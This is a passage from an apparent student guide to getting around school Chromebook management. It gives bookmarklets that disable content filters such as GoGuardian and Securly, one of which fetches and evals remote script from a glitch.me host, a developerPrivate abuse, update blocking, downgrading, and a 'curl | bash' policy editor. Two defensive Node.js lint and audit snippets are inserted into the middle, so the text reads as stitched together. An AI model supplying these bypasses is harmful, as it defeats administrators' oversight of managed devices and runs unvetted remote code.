<li>As soon as it appears, turn off WiFi and restart as fast as possible.</li>
<li>Log back in, go back to extensions, and wait. If it says your blocking extension could be corrupted or doesn't appear at all, then it worked (wait at least a minute with a close watch in case it comes back)</li>
<li>If it didn't work, start over. You have to be fast.</li>
</ol>
<h2 id="extension-launcher-install-extensions-wo-allowlist">Extension Launcher <em>Install extensions w/o allowlist</em></h2>
<p>A bookmarklet capable of installing extensions, for those without an allowlist.</p>
<h3 id="requirements">Requirements</h3>
<ol>
<li>Access to the Chrome Web Store</li>
<li>A Chromebook without allowlist</li>
<li>Bookmarklets enabled</li>
</ol>
<h3 id="instructions">Instructions</h3>
<ol>
<li>Go to <a href="./ext-launcher-bookmarklet.js"><code class="normlcode">ext-launcher-bookmarklet.js</code></a> and save the code as a bookmarklet.</li>
<li>Go to <a href="https://chrome.google.com/webstorex">The Chrome Webstore</a> and use the bookmarklet.</li>
<li>Then enter the icon of the extension, the ID, and the name of it (this does not matter; you can put anything), then press download, and it will work.</li>
</ol>
<h3 id="extra-notes">Extra Notes</h3>
<ul>
<li>Credit to "Aka, but nice" on Discord.</li>
<li>DNS will be up soon for those who have JavaScript bookmarklets blocked.</li>
<li>This will not work if you have a blocklist; it is only for when the web store shows as blocked when you go to it.</li>
</ul>
<h2 id="point-blank-execute-scripts-on-extension-pages">Point-Blank <em>Execute scripts on extension pages</em></h2>
<p>This exploit allows you to execute scripts on extension pages. This is a great example of how Chromebooks are a piece of garbage.</p>
<h3 id="requirements-1">Requirements</h3>
<ol>
<li>Bookmarklets enabled</li>
<li>Access to a working brain</li>
</ol>
<h3 id="getting-started">Getting started</h3>
<ol>
<li>Go to <a href="./newpointblank.js"><code class="normlcode">newpointblank.js</code></a> and save the code as a bookmarklet on your Chromebook.</li>
<li>Now find your blocker from the list below.</li>
</ol>
<h3 id="blockers">Blockers</h3>
<h4 id="securly">Securly</h4>
<p><a href="https://tinyurl.com/bettergoofcurly">Go to this page</a></p>
<p>If it says blocked by Chrome, reload (you have to actually have Securly ofc)</p>
<h4 id="iboss">iBoss</h4>
<p><a href="https://tinyurl.com/goofboss">Go to this page</a></p>
<h4 id="cisco-umbrella">Cisco Umbrella</h4>
<p><a href="https://tinyurl.com/goofumbrella">Go to this page</a></p>
<h4 id="blocksi">Blocksi</h4>
<p><a href="https://tinyurl.com/goofsi">Go to this page</a></p>
<h4 id="goguardian">GoGuardian</h4>
<p><a href="https://tinyurl.com/goofguardian">Go to this page</a></p>
<p>If your school updated GoGuardian, this exploit may not work.</p>
<h3 id="extra-notes-1">Extra Notes</h3>
<ul>
<li>Most of these links are a block page (this is intentional).</li>
<li>Each page should have a blue link. Click the link on the page; if it opens a blank page, click the bookmarklet that you just made.</li>
<li>Click either hard disable or soft disable; soft disable will only disable it until you restart your Chromebook.</li>
<li>You can also run some of the scripts and run your own code. Your extension may disable JavaScript running on it, so running your own code may not work.</li>
<li>I recommend doing soft disable, which only disables it until restart.</li>
<li>The idea was from <a href="https://bolg.glitch.me/_/point-blank/">Bypassi#7037</a></li>
</ul>
<h2 id="uboss-tamper-with-iboss">UBoss <em>Tamper with iBoss</em></h2>
<p>This works only for iBoss and Blocksi. If you don't have one of these, use New Point Blank.</p>
<h3 id="requirements-2">Requirements</h3>
<ul>
<li>Bookmarklets enabled</li>
<li>Access to a working brain</li>
</ul>
<h3 id="getting-started-1">Getting started</h3>
<ol>
<li>Go to the corresponding link for your blocker below.</li>
</ol>
<p>iBoss: <a href="https://tinyurl.com/byeswamp">tinyurl.com/byeswamp</a></p>
<p>Blocksi: <a href="https://tinyurl.com/blockboss">tinyurl.com/blockboss</a></p>
<p>Then bookmark the code below:</p>
<pre><code class="language-js">javascript:opener.eval(`fetch("https://rounded-boiling-flax.glitch.me/uboss.js").then(data=>{data.text().then(e=>{eval(e)})})`) && close();
</code></pre>
<ol start="2">
<li>Then go to the site with your blocker that was listed above.</li>
<li>Run the code. Follow the instructions there.</li>
</ol>
<p>If it doesn't work, let us know by creating a discussion. This was made in partnership with <code class="normlcode">akabutnice</code> and <code class="normlcode">bypassi</code>.</p>
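<p>The bookmarklet above relies on the page that opened the tab having left a usable <code class="normlcode">opener</code> reference and a content security policy that lets <code class="normlcode">eval</code> compile strings. As an added example (not from this page or any blocker's code base), this Node.js lint checks an extension's manifest and page sources for both conditions; the file names and sample sources are constructed.</p>

```javascript
// Added example: lint an extension for the two conditions opener.eval needs.
// Not taken from any real blocker; the sample manifest and sources are constructed.
function cspOf(manifest) {
  const csp = manifest.content_security_policy;
  if (typeof csp === "string") return csp; // Manifest V2 form
  if (csp && typeof csp === "object") return csp.extension_pages || ""; // V3 form
  return "";
}

function lintExtension(manifest, sources) {
  const findings = [];
  // eval() on an extension page only runs when its CSP allows 'unsafe-eval'.
  if (/'unsafe-eval'/.test(cspOf(manifest))) {
    findings.push("manifest: CSP allows 'unsafe-eval'");
  }
  for (const [file, text] of Object.entries(sources)) {
    // window.open(...) hands the new tab a window.opener unless "noopener" is passed.
    for (const m of text.matchAll(/window\.open\(([^)]*)\)/g)) {
      if (!/noopener/.test(m[1])) findings.push(`${file}: window.open without noopener`);
    }
    // rel="opener" explicitly re-enables the reference on target=_blank links.
    for (const m of text.matchAll(/<a\b[^>]*\brel\s*=\s*["']([^"']*)["'][^>]*>/gi)) {
      if (m[1].split(/\s+/).includes("opener")) findings.push(`${file}: link with rel="opener"`);
    }
  }
  return findings;
}

// Constructed sample: a block page that opens a blank tab and permits eval.
const sampleManifest = {
  manifest_version: 2,
  content_security_policy: "script-src 'self' 'unsafe-eval'; object-src 'self'",
};
const sampleSources = {
  "blocked.js": 'more.onclick = () => window.open("about:blank");',
  "blocked.html": '<a href="help.html" target="_blank" rel="noopener">Help</a>',
};
console.log(lintExtension(sampleManifest, sampleSources).join("\n"));
```

<p>An empty result means neither condition was found by these patterns; the regular expressions are a first pass, not a full parser.</p>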
<h2 id="caub-prevent-updates">CAUB <em>Prevent Updates</em></h2>
<p>This exploit keeps your Chromebook downgraded (or on the current version) without automatic updates screwing you over. This exploit was found by Catakang#0987. Using ONC files, you can convince your Chromebook that the WiFi that you're connected to is pay-to-use (like a hotspot using data), and thus it will not check for updates.</p>
<h3 id="requirements-3">Requirements</h3>
<ul>
<li>Access to <code class="normlcode">chrome://network#state</code></li>
</ul>
<h3 id="getting-started-2">Getting started</h3>
<ol>
<li>Go to <code class="normlcode">chrome://network#state</code>.</li>
<li>Scroll to the bottom of the page. You will see a list of WiFi that you have connected to before.</li>
<li>Click the <code class="normlcode">+</code> sign next to the WiFi name of each network that you commonly connect your Chromebook to.</li>
<li>We are going to make it so that when the Chromebook is connected to those networks, it will not check for updates.</li>
<li>Use ctrl+a and ctrl+c to copy all the text on the entire network#state page.</li>
<li>Go to <a href="./caub.html">./caub.html</a>.</li>
<li>Paste the copied text into the textbox below.</li>
<li>Press the <code class="normlcode">generate onc</code> button below the textbox.</li>
<li>Once you have downloaded the file, go to <code class="normlcode">chrome://network#general</code>.</li>
<li>Click on the <code class="normlcode">import ONC</code> button.</li>
<li>Import the newly downloaded file.</li>
</ol>
<p><strong>Extra notes</strong></p>
<ul>
<li>Your Chromebook will no longer automatically update (as long as you are on a WiFi that you CAUBed).</li>
<li>Be careful not to stay on WiFi for too long without using CAUB on it; otherwise, you might update.</li>
<li>We cannot guarantee that this will work on every WiFi, but it should work on most.</li>
</ul>
<h2 id="caub-flags-prevent-updates">CAUB Flags <em>Prevent Updates</em></h2>
<p>This alt exploit keeps your Chromebook downgraded (or on the current version) without automatic updates screwing you over. This exploit was found by <a href="https://github.com/MechaXYZ">MechaXYZ</a>. Using a Chrome flag, you can convince your Chromebook not to automatically update.</p>
<h3 id="requirements-4">Requirements</h3>
<ul>
<li>Access to <code class="normlcode">chrome://flags</code></li>
</ul>
<h3 id="getting-started-3">Getting started</h3>
<ol>
<li>Go to <code class="normlcode">chrome://flags#show-metered-toggle</code> or search "metered" in <code class="normlcode">chrome://flags</code> instead.</li>
<li>Enable it and restart your device.</li>
<li>Open the Settings app.</li>
<li>Go to your Network >> Advanced >> Show metered toggle and turn it on.</li>
</ol>
<p><strong>Extra notes</strong></p>
<ul>
<li>Your Chromebook will no longer automatically update (as long as you have the flag enabled).</li>
<li>You must be able to enable flags (they can't be blocked); otherwise, this exploit won't work.</li>
</ul>
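<p>The Requirements lists in the JPCMG, CAUB, CAUB Flags and bookmarklet-based sections of this page name the browser surfaces each method needs. The following is an added example, not code from this page or its authors: a Node.js check of a policy export against those requirements. The flat <code class="normlcode">{name: value}</code> export shape, the sample values and the simplified pattern matching are assumptions; the policy names are Chrome enterprise policies.</p>

```javascript
// Added example: check a managed-policy export against the "Requirements"
// lists on this page. The export shape and sample values are constructed.
const REQUIRED_BLOCKS = {
  "chrome://serviceworker-internals": "JPCMG",
  "chrome://network": "CAUB",
  "chrome://flags": "CAUB Flags",
  "javascript://*": "bookmarklet-based sections",
};

// Simplified matcher: an entry covers a target when it equals it or is a
// scheme-wide wildcard such as "chrome://*". Real URLBlocklist filters
// accept more forms than this.
function covers(entry, target) {
  const e = entry.trim().toLowerCase().replace(/\/+$/, "");
  if (e === target) return true;
  const scheme = target.slice(0, target.indexOf("://"));
  return e === `${scheme}://*`;
}

function auditPolicies(policies) {
  const findings = [];
  const blocklist = Array.isArray(policies.URLBlocklist) ? policies.URLBlocklist : [];
  const allowlist = Array.isArray(policies.URLAllowlist) ? policies.URLAllowlist : [];
  for (const [target, section] of Object.entries(REQUIRED_BLOCKS)) {
    if (!blocklist.some((e) => covers(e, target))) {
      findings.push(`URLBlocklist does not cover ${target} (${section})`);
    } else if (allowlist.some((e) => covers(e, target))) {
      // URLAllowlist entries are exceptions to the blocklist.
      findings.push(`URLAllowlist re-opens ${target} (${section})`);
    }
  }
  // DeveloperToolsAvailability: 2 means developer tools are disallowed.
  if (policies.DeveloperToolsAvailability !== 2) {
    findings.push("DeveloperToolsAvailability is not 2 (JPCMG needs Inspect)");
  }
  return findings;
}

// Constructed sample: flags and bookmarklets are blocked, the rest is not.
const samplePolicies = {
  URLBlocklist: ["chrome://flags", "javascript://*"],
  DeveloperToolsAvailability: 1,
};
console.log(auditPolicies(samplePolicies).join("\n"));
```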
<h2 id="blank3r">Blank3r</h2>
<p>Blank3r is an exploit that allows you to run bookmarklets on privileged pages, such as the Chrome extensions page. This exploit was made with Point Blank as well.</p>
<h3 id="requirements-5">Requirements</h3>
<ul>
<li>Bookmarklets enabled</li>
</ul>
<h3 id="getting-started-4">Getting started</h3>
<ol>
<li>Bookmark this code:</li>
</ol>
<pre><code class="language-js">javascript:let shim = false;var ids = prompt("extension ids (comma separated)").split(",");setInterval(()=>{ids.forEach((id)=> opener.chrome.developerPrivate.updateExtensionConfiguration({extensionId: id, fileAccess: shim}));shim = !shim;}, 145);
</code></pre>
<ol start="2">
<li>Navigate to <code class="normlcode">chrome://extensions</code>.</li>
<li>Click on an extension that YOU installed from the Chrome Web Store > Details.</li>
<li>In the URL bar, copy the string of letters and numbers after the <code class="normlcode">/?id=</code>.</li>
<li>Click "View in Chrome Web Store" and spam the escape key. If it loads into the Chrome Web Store, try again; if it is a blank screen, click the bookmarklet.</li>
<li>Paste the ID of the extension into the prompt, separating multiple IDs with commas.</li>
</ol>
<p>If you close the tab, the exploit will stop working.</p>
<h2 id="downgrading-change-versions">Downgrading <em>Change versions</em></h2>
<p>Downgrading can be used for several exploits, to get to a version that does not have patches for certain exploits, such as LTBEEF, SH1MMER, or CryptoSmite. This is a built-in feature of ChromeOS.</p>
<p>Please do note that depending on your <code class="normlcode">kernver=</code> you may not be able to downgrade to certain versions. More info is at the <a href="#finding-kernver">Finding Kernver</a> section.</p>
<h3 id="requirements-6">Requirements</h3>
<ul>
<li>A USB thumb drive with at least 8GB of storage; however, 16GB (or more) is recommended.</li>
<li>A personal computer with access to downloading the Chromebook Recovery Utility.</li>
</ul>
<h3 id="setup">Setup</h3>
<ol>
<li>Navigate to <code class="normlcode">chrome://version</code> on the Chromebook you wish to downgrade. If that is blocked, try <code class="normlcode">chrome://system/:~:text=CHROMEOS_RELEASE_DESCRIPTION</code>, and check for your board under <code class="normlcode">Platform</code>. For me, that would be octopus.</li>
</ol>
<p><img src="./assets/chromeos-check-board.png" alt="chrome://version"></p>
<ol start="2">
<li>Navigate to <a href="https://chrome100.dev/">chrome100.dev</a>, press <code class="normlcode">ctrl+f</code> and type in your board.</li>
<li>Find and download the Chrome version you want to your personal computer.</li>
</ol>
<h3 id="downgrading">Downgrading</h3>
<ol>
<li>Install <a href="https://chromewebstore.google.com/detail/chromebook-recovery-utili/pocpnlppkickgojjlmhdmidojbmbodfm">Chromebook Recovery Utility</a> onto your personal computer.</li>
<li>Open the extension, click on the settings button in the top right-hand corner, and click "Use local image".</li>
<li>Select the recovery image you downloaded from chrome100.</li>
<li>Plug in the USB you wish to use, and follow the prompts on the screen.</li>
<li>On your Chromebook, press esc+reload+power and follow the prompts.</li>
<li>On the checking for updates screen or Wi-Fi selection screen, press <code class="normlcode">ctrl</code>+<code class="normlcode">alt</code>+<code class="normlcode">e</code> to skip the "checking for updates" screen.</li>
</ol>
<h2 id="pollen-policy-editor">Pollen <em>Policy Editor</em></h2>
<p>chromeOS User Policy Editor</p>
<h3 id="requirements-7">Requirements</h3>
<ul>
<li>Devmode <strong>NEEDS</strong> to be enabled.</li>
</ul>
<h3 id="getting-started-5">Getting started</h3>
<p>There are two modes for this; I recommend just using the first one.</p>
<h4 id="normal">Normal</h4>
<ol>
<li>Open Crosh (Ctrl+Alt+T)</li>
<li>Run the following commands:</li>
</ol>
<pre><code class="language-sh">shell
sudo su
curl -Ls https://mercuryworkshop.github.io/Pollen/Pollen.sh | bash
</code></pre>